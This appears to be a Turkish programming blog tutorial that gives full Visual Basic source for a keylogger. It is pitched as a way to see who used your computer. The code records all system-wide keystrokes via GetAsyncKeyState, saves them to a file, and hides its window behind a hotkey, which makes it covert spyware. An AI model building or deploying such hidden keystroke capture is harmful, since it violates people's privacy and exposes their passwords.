Visual Basic ile Klavyenizde Basılan Tuşları Gösterme (Kim Kullanmış?)

 Bugün sizlere Visual Basic ile Klavyenizde Basılan Tuşları Gösterme (Kim Kullanmış?) kullanımını göstereceğiz. Bilgisayarınızı siz hariç kullanan var mı? Bilgisayarınızı kullananlar hangi tuşları kullanmış? İş yeriniz de veya evde izinsiz bilgisayarınızı kullanan var mı ? Gibi oldukça gizlilik gereken bu uygulamamızı adım adım denemeniz çok önemlidir. 


Vb.net Dizi Değişkenleri ve Örnekleri
Visual Studio Görseli

Form Alanı

Formumuza ilk olarak 1 adet TextBox ekleyeceğiz. TextBoxımız ise "Multiline True" modunda olacaktır. İkinci aşama olarak bir Timer ekleyeceğiz. İntervalini de "50" yapacağız. Son olarak ise 1 adet Commondialog ekleyeceğiz. Adını ise "Cmd1" yapacağız. Evet form alanımız bittiğine göre şimdi bir menü oluşturmamız gerekmektedir. Bir sonraki aşama olan menü alıştırma aşamasına geçeceğiz.

Menü Oluşturma

Menü oluştururken dikkatli olmalıyız. Çünkü bütün kod metnimiz bu oluşturduğumuz menü doğrultusunda ilerleyecektir. İşte sırası ile menü oluşturma adımlarımız:

Caption - Name olarak  tanımlıyoruz.

Aç - Ac olarak  tanımlıyoruz.

Kaydet - ky olarak tanımlıyoruz.

Gizle - gzle olarak tanımlıyoruz.

Temizle - tmz olarak tanımlıyoruz.

Kısayol Tuşlar - ksyı olarak tanımlıyoruz.

Çıkış - cks olarak tanımlıyoruz.

Menümüzü oluşturduktan sonra sıra da kısa yol tuşlarımızı tanıtmamız gerekiyor. Kısa yol tuşlarımız ise sırası ile şunlardır;

Ctrl + Alt + P Gizle
Ctrl + Alt + G Göster

Kod Alanı

Bu uygulamamız da bulunan kod alanında bir değişiklik yaptık. Her zaman önden anlattığımız kod metnini bu sefer kod metnini içinde anlattık. Bunu yapma sebebimiz ise bu farklı farklı bir örnek uygulama olmayıp hepsi bir bütünen çalışmasıdır. O yüzden sizler de olduğu gibi kopyalamadan önce adım adım kod metnini okuyarak ilerlemeye çalışın. Çünkü aradaki bağlantıları kuramayıp gözden kaçırabilirsiniz. İşte size yeni bir kod uygulama macerası. Uygulama hakkında sormak istediklerinizi yoruma ekleyebilirsiniz. İsterseniz yaptığınız uygulamayı bizimle paylaşabilirsiniz. Bizler de sizlerin adına sitemiz de yayınlarız. İyi denemeler.

Option Explicit 'Hiç Declare edilmemiş değişken varmı diye kontrol etmesi için kod
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
'İlk Önce Apiyi Declare Ettik Hangi Tuşa Bastığımızı Anlaması İçin
 
Private Sub ac_Click() ' Aç Menüsü
Dim yazı As String 'Yazı yı String Yaptık
Dim x As String 'X De String
On Error GoTo hatabulundu ' Hata Olduğunda Hatabulundu Etiketine Git
x = MsgBox("Kaydetmek İstermisiniz?", vbInformation + vbYesNo, "Çıkış") 'Kaydetmek İstediğini Sor
If x = vbYes Then 'Eğer Cevap Evet İse
ky_Click 'Kaydet Menüsüne Tıkla
Else 'Değilse
Text1.Text = "" 'Text1in İçindekini Sil
Cmd1.Filter = "Yazı Dosyası (*.txt)|*.txt" 'Dosyaları Filtrele Sadece txt Dosyası
Cmd1.FilterIndex = 0 '1.Filtreyi Seç
Cmd1.ShowOpen 'Aç
Open Cmd1.FileName For Input As #1 'Cmd deki İsimli dosyayı Aç
Do Until EOF(1) 'Satır 1 Olana Kadar Tekrarla
Input #1, yazı 'Ve Hersatırdaki Yazıyı Yazı değişkenine ata
Text1.Text = Text1.Text + yazı + vbCrLf 've onuda texte ata
Loop 'Döngüyü Bitir
Close #1 'Kapat
End If
Exit Sub
hatabulundu: 'Etiket
MsgBox "Hata!Hata Adı : " & Err.Description, vbCritical, "Hata!" 'Hata Ver
End Sub
 
Private Sub cks_Click() 'Çıkış Menüsü
Dim x As String
x = MsgBox("Kaydetmek İstermisiniz?", vbInformation + vbYesNo, "Çıkış") 'Kaydetmek İstiyormusunuz Diye Sor
If x = vbYes Then 'Cevap Evet İse
ky_Click 'Kaydet Menüsüne Tıkla
Else 'Değilse
End 'Çık
End If
End Sub
 
Private Sub Form_Resize() 'Form Boyutlandırıldığında
Text1.Left = 0 'Text1in left i 0
Text1.Top = 0 'Topda 0 Yani Başta
Text1.Width = Me.ScaleWidth 'Uzunluğu Formun Uzunlğuna Eşitle
Text1.Height = Me.ScaleHeight 'Genişliğide
End Sub
 
Private Sub gzle_Click() 'Gizleye Tıkladığında
Me.Hide 'Formu Gizle
End Sub
 
Private Sub ksy_Click() 'Kısayol Tuşlarına Tıklandığında
MsgBox "Ctrl + Alt + P = Gizle" & vbCrLf & "Ctrl + Alt + G = Göster", vbInformation, "Kısayol Tuşları" 'Kısayol Tuşlarını Yaz
End Sub
 
Private Sub ky_Click()
On Error GoTo hatabulundu 'Hata Olunca hatabulundu etiketine git
Cmd1.Filter = "Yazı Dosyası (*.txt)|*.txt" 'Filtrele
Cmd1.FilterIndex = 0 'İlk i Seç
Cmd1.ShowSave 'Kaydet
Open Cmd1.FileName For Output As #1 'O isimli bir dosya oluştur
Print #1, Text1.Text 'İçine text1 dekileri yaz
Close #1 'Kapat
Exit Sub
hatabulundu: 'Etiket
MsgBox "Hata!Hata Adı : " & Err.Description, vbCritical, "Hata!"
End Sub
 
Private Sub Timer1_Timer()
Dim i As Long
If GetAsyncKeyState(17) And GetAsyncKeyState(18) And GetAsyncKeyState(71) Then Me.Show
If GetAsyncKeyState(17) And GetAsyncKeyState(18) And GetAsyncKeyState(80) Then Me.Hide
'Ctrl Alt G Ye Bastığında göster Ctrl Alt P Ye Bastığında Gizle
For i = 5 To 200 'İ yi 5 den 200e kadar tekrarla
If GetAsyncKeyState(i) <> 0 Then 'Basılan tuşun kodu 5 ile 200 arasında ise
Text1.Text = Text1.Text & Chr(i) 'Basılan tuşu Texte Yaz
End If
Next
End Sub
 
Private Sub tmz_Click() 'Temizleye Tıkladığında
Text1.Text = "" 'Textdeki Yazıları Sil
End Sub

VB.NET ile ilgili dikkatinizi çekebilecek diğer örnek uygulamalarımız

1. Visual Basic Kurulumu ve Kaldırılması
2. Visual Basic .Net'de Yazıcı Uygulaması Geliştirme Komutları
3. Visual Basic Net'de Rastgele Sayı Üretme Uygulaması
4. Visual Basic Access Elle Bağlantı Nasıl Yapılır?
5. VB.NET de Formları İç İçe Açma


Yorum Gönder

Daha yeni Daha eski